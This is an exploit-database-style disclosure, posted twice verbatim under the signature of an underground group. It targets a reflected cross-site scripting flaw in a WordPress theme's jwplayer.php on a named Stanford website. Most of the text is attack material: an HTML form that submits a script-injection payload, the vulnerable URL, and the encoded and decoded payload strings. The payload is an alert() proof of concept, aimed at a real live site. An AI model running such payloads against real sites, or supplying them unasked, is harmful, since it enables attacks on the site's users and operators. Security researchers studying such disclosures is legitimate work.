ثغرة exploit خطأ bug ووردبريس wordpress قالب template ستانفورد stanford اكس اس اس xss كروس سايت سكربتنج cross site scripting
******************
Exploit Title: Stanford Wordpress Template Cross Site Scripting Vulnerability
Exploit Author: Sha4yan
Vendor Homepage : http://stvp.stanford.edu/
Google Dork: none
Date: 2016-01-01
Tested on: Ubuntu / Mozila Firefox
******************
Exploit Code:
<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<form method="POST"
action="http://stvp.stanford.edu/wp-content/themes/stvp/jwplayer.php?id=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E">
<input type="submit" value="Exploit@Sha4yan"/>
</form>
</body>
</html>
******************
Location & Vulnerable query:
http://stvp.stanford.edu/wp-content/themes/stvp/jwplayer.php?id=
Add This :
%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
******************
Proof:
Executable script tag in Stanford's own page:
Exploit :
"><script>alert(/xss/)</script>
Exploit query:
http://stvp.stanford.edu/wp-content/themes/stvp/jwplayer.php?id=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
******************
Persian Underground GateWay
******************
******************
Exploit Title: Stanford Wordpress Template Cross Site Scripting Vulnerability
Exploit Author: Sha4yan
Vendor Homepage : http://stvp.stanford.edu/
Google Dork: none
Date: 2016-01-01
Tested on: Ubuntu / Mozila Firefox
******************
Exploit Code:
<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<form method="POST"
action="http://stvp.stanford.edu/wp-content/themes/stvp/jwplayer.php?id=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E">
<input type="submit" value="Exploit@Sha4yan"/>
</form>
</body>
</html>
******************
Location & Vulnerable query:
http://stvp.stanford.edu/wp-content/themes/stvp/jwplayer.php?id=
Add This :
%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
******************
Proof:
Executable script tag in Stanford's own page:
Exploit :
"><script>alert(/xss/)</script>
Exploit query:
http://stvp.stanford.edu/wp-content/themes/stvp/jwplayer.php?id=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
******************
Persian Underground GateWay
******************